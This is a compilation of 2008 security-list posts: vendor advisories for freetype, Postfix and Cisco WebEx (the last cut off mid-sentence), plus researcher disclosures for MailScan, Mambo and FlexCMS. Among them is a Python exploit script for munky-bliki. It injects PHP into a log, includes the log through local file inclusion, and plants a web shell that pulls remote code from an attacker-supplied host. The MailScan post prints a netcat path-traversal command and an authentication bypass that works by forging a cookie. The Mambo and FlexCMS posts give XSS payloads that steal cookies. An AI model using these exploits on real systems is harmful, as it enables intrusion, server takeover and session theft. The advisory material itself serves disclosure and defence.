rPSA-2008-0255-1 freetype
rPath Security Advisory: 2008-0255-1 Published: 2008-08-14 Products: rPath Appliance Platform Linux Service 1 rPath Appliance Platform Linux Service 2 rPath Linux 1 rPath Linux 2 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/2.1.10-5.3-1 [EMAIL PROTECTED]:2/2.3.6-1-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2608 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1806 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1808 Description: Previous versions of the freetype package are vulnerable to multiple Arbitrary Code Execution attacks when processing malformed Printer Font Binary (PFB) and TrueType Font (TTF) files. http://wiki.rpath.com/Advisories:rPSA-2008-0255 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ GLSA 200808-12 ] Postfix: Local privilege escalation vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Postfix: Local privilege escalation vulnerability Date: August 14, 2008 Bugs: #232642 ID: 200808-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Postfix incorrectly checks the ownership of a mailbox, allowing, in certain circumstances, to append data to arbitrary files on a local system with root privileges. Background == Postfix is Wietse Venema's mailer that attempts to be fast, easy to administer, and secure, as an alternative to the widely-used Sendmail program. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mail-mta/postfix 2.5.3-r1 *= 2.4.7-r1 = 2.5.3-r1 Description === Sebastian Krahmer of SuSE has found that Postfix allows to deliver mail to root-owned symlinks in an insecure manner under certain conditions. Normally, Postfix does not deliver mail to symlinks, except to root-owned symlinks, for compatibility with the systems using symlinks in /dev like Solaris. Furthermore, some systems like Linux allow to hardlink a symlink, while the POSIX.1-2001 standard requires that the symlink is followed. Depending on the write permissions and the delivery agent being used, this can lead to an arbitrary local file overwriting vulnerability (CVE-2008-2936). Furthermore, the Postfix delivery agent does not properly verify the ownership of a mailbox before delivering mail (CVE-2008-2937). Impact == The combination of these features allows a local attacker to hardlink a root-owned symlink such that the newly created symlink would be root-owned and would point to a regular file (or another symlink) that would be written by the Postfix built-in local(8) or virtual(8) delivery agents, regardless the ownership of the final destination regular file. Depending on the write permissions of the spool mail directory, the delivery style, and the existence of a root mailbox, this could allow a local attacker to append a mail to an arbitrary file like /etc/passwd in order to gain root privileges. The default configuration of Gentoo Linux does not permit any kind of user privilege escalation. The second vulnerability (CVE-2008-2937) allows a local attacker, already having write permissions to the mail spool directory which is not the case on Gentoo by default, to create a previously nonexistent mailbox before Postfix creates it, allowing to read the mail of another user on the system. Workaround == The following conditions should be met in order to be vulnerable to local privilege escalation. * The mail delivery style is mailbox, with the Postfix built-in local(8) or virtual(8) delivery agents. * The mail spool directory (/var/spool/mail) is user-writeable. * The user can create hardlinks pointing to root-owned symlinks located in other directories. Consequently, each one of the following workarounds is efficient. * Verify that your /var/spool/mail directory is not writeable by a user. Normally on Gentoo, only the mail group has write access, and no end-user should be granted the mail group ownership. * Prevent the local users from being able to create hardlinks pointing outside of the /var/spool/mail directory, e.g. with a dedicated partition. * Use a non-builtin Postfix delivery agent, like procmail or maildrop. * Use the maildir delivery style of Postfix (home_mailbox=Maildir/ for example). Concerning the second vulnerability, check the write permissions of /var/spool/mail, or check that every Unix account already has a mailbox, by using Wietse Venema's Perl script available in the official advisory. Resolution == All Postfix users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =mail-mta/postfix-2.5.3-r1 References == [ 1 ] CVE-2008-2936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2936 [ 2 ] CVE-2008-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2937 [ 3 ] Official Advisory http://article.gmane.org/gmane.mail.postfix.announce/110 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality
Cisco Security Advisory: Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Vulnerability in Cisco WebEx Meeting Manager ActiveX Control Advisory ID: cisco-sa-20080814-webex Revision 1.0 For Public Release 2008 August 14 2230 UTC (GMT) +- Summary === An ActiveX control (atucfobj.dll) that is used by the Cisco WebEx Meeting Manager contains a buffer overflow vulnerability that may result in a denial of service or remote code execution. The WebEx Meeting Manager is a client-side program that is provided by the Cisco WebEx meeting service. The Cisco WebEx meeting service automatically downloads, installs, and configures Meeting Manager the first time a user begins or joins a meeting. When users connect to the WebEx meeting service, the WebEx Meeting Manager is automatically upgraded to the latest version. There is a manual workaround available for users who are not able to connect to the WebEx meeting service. Cisco WebEx is in the process of upgrading the meeting service infrastructure with fixed versions of the affected file. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20080814-webex.shtml Affected Products = Vulnerable Products +-- The WebEx Meeting Manager downloads several components to meeting participants before they join a WebEx meeting. The vulnerability in this Security Advisory affects the atucfobj.dll library. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by this vulnerability. Details === The WebEx meeting service is a hosted multimedia conferencing solution that is managed by and maintained by Cisco WebEx. When a meeting participant connects to the WebEx meeting service through a web browser, the WebEx meeting service installs several components of the WebEx Meeting Manager browser plugin on the meeting participant's system. WebEx Meeting Manager includes atucfobj.dll, a DLL that allows meeting participants to view Unicode fonts. This library contains a buffer overflow vulnerability that could allow an attacker to execute arbitrary code. The WebEx meeting service currently maintains three different versions of software. WebEx meeting service servers run one of the following versions: WBS 23, WBS 25, or WBS 26. This vulnerability is documented in WebEx Bug IDs 292551 for WBS 26 and 306639 for WBS 25. This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2737. Identifying WebEx Meeting Service Version + The following procedure allows meeting participants to identify the version of client software that is provided by a WebEx server. The procedure varies slightly depending on the version of the WebEx server software. The URL in all the following examples is provided to meeting participants as part of the WebEx meeting invite. Client build numbers adhere to the format of XX.YY.ZZ.. The first number indicates the major version number of the software build. For example, a client build number of 26.49.9.2838 indicates a WBS 26-based software version. For the WBS 26 version: 1. Browse to the WebEx meeting server at https://servername.webex.com/. 2. Select Support from the left side of the web page. 3. Select Downloads from the left side of the web page. 4. The version of the client software that is provided by the server is listed next to Client build. For WebEx servers that are running WBS 26, the first fixed version is 26.49.9.2838. Client build versions prior to 26.49.9.2838 are vulnerable. For the WBS 25 version: 1. Browse to the WebEx meeting server at https://servername.webex.com/. 2. Select Assistant on the left side of the page. 3. Select the Support link. 4. Select the Version link, which is displayed on the right side of the top of the page. 5. The Client Build version is displayed in a pop-up window. There is currently no fixed version for the WBS 25-based WebEx meeting service. This section of the Security Advisory will be updated when fixed version information is available. For the WBS 23 version: Servers that run WBS 23-based WebEx meeting service display version information using the following URL format: https://servername.webex.com/version/wbxversionlist.do?siteurl=servername On the redisplayed page the Client versions in files field will indicate the Client Build. For example: The 'T23' in WBXclient-T23L10NSP33EP13-1092.txt indicates a WBS 23-based system. Cisco WebEx is not planning to repair WBS 23-based software. Affected WBS 23-based servers will be upgraded to fixed WBS 25 or WBS 26-based software. Attack Vector Details + This Security Advisory addresses a vulnerable ActiveX control (atucfobj.dll). If atucfobj.dll is present on a client's computer, it may be possible for an
Re: MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface
Please find attached the advisory regarding MicroWorld's MailScan for Mailservers. Cheers, Oliver MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface Affected Products - MailScan for Mail Servers * Version: 5.6.a with espatch1 * Win32 Platform Other Mailscan Products, Versions, also, if available for other platforms, were not tested. Product/Company Information From MicroWorld's website: MailScan 5.6 is the world's most advanced Real-Time AntiVirus and AntiSpam solution for Mail Servers. The software safeguards organizations against Virus, Worm, Trojan and many other malware breeds with futuristic and proactive technologies. Employing an array of intelligent filters, MailScan offers powerful protection against Spam and Phishing mails along with comprehensive Content Security. http://www.microworld.de http://www.mwti.net Vulnerabilities MailScan offers Web Based Administration. The administration console (Server.exe) is running as an http service on tcp port 10443 with LocalSystem privileges. The communication is plain http without SSL/TLS. The interface is vulnerable to the attacks described below. All attacks do *not* require authentication. -- Directory Traversal It is possible to access files on the system outside of the webroot directory with privileges of the LocalSystem account: echo -e GET /../../../../boot.ini HTTP/1.0\r\n\r\n | nc server port -- Authentication bypass After a login attempt with an invalid username and password, the application is setting a cookie at the webclient with the following content: Set-Cookie: User=admin; path=/ Set-Cookie: login=true; path=/ Set-Cookie: IsAdmin=false; path=/ Set-Cookie: IP=; path=/ Providing valid username and password will give a cookie with the following content: Set-Cookie: User=admin; path=/ Set-Cookie: login=true; path=/ Set-Cookie: IsAdmin=true; path=/ Set-Cookie: IP=; path=/ It is sufficient to set the cookie as shown above to get authenticated on the admin interface. The user admin is a default account, with a password set during installation. *BUT* requesting a resource on the webserver *without* supplying a cookie will also grant access to the requested resource. The attacker just needs to know the path to the resource. -- Cross-Site-Scripting (XSS) http://ip:10443/scriptalert(No_Problem_its_just_an_admin_interface)/script -- Access to Logfile It is possible to access the logfiles of the application because the folder /LOG inside the webroot (C:\Program Files\Common Files\MicroWorld\WebServer) is not protected note that this does not require the directory traversal, mentioned before and thus is imho a separate vuln. The logfiles contain different information, like installation path, ip adresses, and error messages. http://ip:10443/LOG/W072808.LOG (Format seems to be W:Month:Date:year) and http://ip:10443/LOG/Weblog.LOG History 28. July 2008 - Touching base with MicroWorld's Support via Messenger 28. July 2008 - Sending High-Level description of vulns and RFP-Policy to agree 30. July 2008 - MicroWorld agreed to the policy 30. July 2008 - Detailed description and PoC-Script creating an admin user without authenticatin send to Microworld 01. Aug. 2008 - Asking Microworld if they were able to reproduce 02. Aug. 2008 - MicroWorld answered: Not Yet 05. Aug. 2008 - Asking Microworld if they were able to reproduce, and if yes, when a patch will be available 13. Aug. 2008 - No response from Microworld; I informed them that i will publish an advisory within the next days 15. Aug. 2008 - Advisory release Credits mail: Oliver-dot-karow-at-gmx-dot-de advisory: http://www.oliverkarow.de/research/mailscan.txt blog: http://oliver.greyhat.de/2008/08/15/multiple-vulnerabilities-within-mailscan-admin-interface/
munky-bliki lfi
#!user/bin/python # -*- coding: cp1256 -*- # munky-bliki Lfi # # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # # # #Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz # # #DORK : Copyright © 2004 Dovid Kopel # # # # # [Bug] # # # #http://Site/?zone=file.type%00 # # [Note] # # # #By this exploit u can create a shell on valun site ;) # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ## import httplib,urllib site=raw_input('Site [Ex www.r3d.com]: ') path=raw_input('Path [Ex /munky]: ') shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ') print [*]Powered by : R3d.W0rm - [EMAIL PROTECTED] conn=httplib.HTTPConnection(site) print [*]Connected to + site print [*]Sending shell code ... conn.request('GET',path + /?zone=?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'?php%20include%20\\' + shell + \\';?');fclose($fp);?) print [*]Running shell code ... data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00') print [*]Shell created print [*] + site + path + '/r3d.w0rm.php'
Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
Script : Mambo 4.6.2 Full Older Versions Type : Multiple Cross Site Scripting Vulnerabilities Alert Level : Medium Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip Discovered by : Khashayar Fereidani My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability 1 : Vulnerable File : administrator/popups/index3pop.php Vulnerable Line (5) : title?php echo $mosConfig_sitename; ? - Administration [Mambo]/title Vulnerable Variable : mosConfig_sitename For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=/titlescriptalert(document.cookie)/script Attacker can hijack administrator cookie and session and login with they Cross Site Scripting Vulnerability 2 : Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php? Vulnable Variable : Any Variable - You can set any variable For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=scriptalert('xss')/script you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?scriptalert('xss')/script=Hello+Word Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
FlexCMS = 2.5 Cross Site Scripting Vulnerability
Script : FlexCMS = 2.5 Type : Cross Site Scripting Vulnerability Alert : Low Download From : http://www.flexcms.com/ Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability : File Name : inc-core-admin-editor-previouscolorsjs.php Vulnerable Variable : PreviousColorsString Send Method : GET Register_globals : On Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');'; Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=scriptalert(document.cookie)/script Attacker can hijack admin cookie with this vulnerability Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ... Tnx : God HTTP://IRCRASH.COM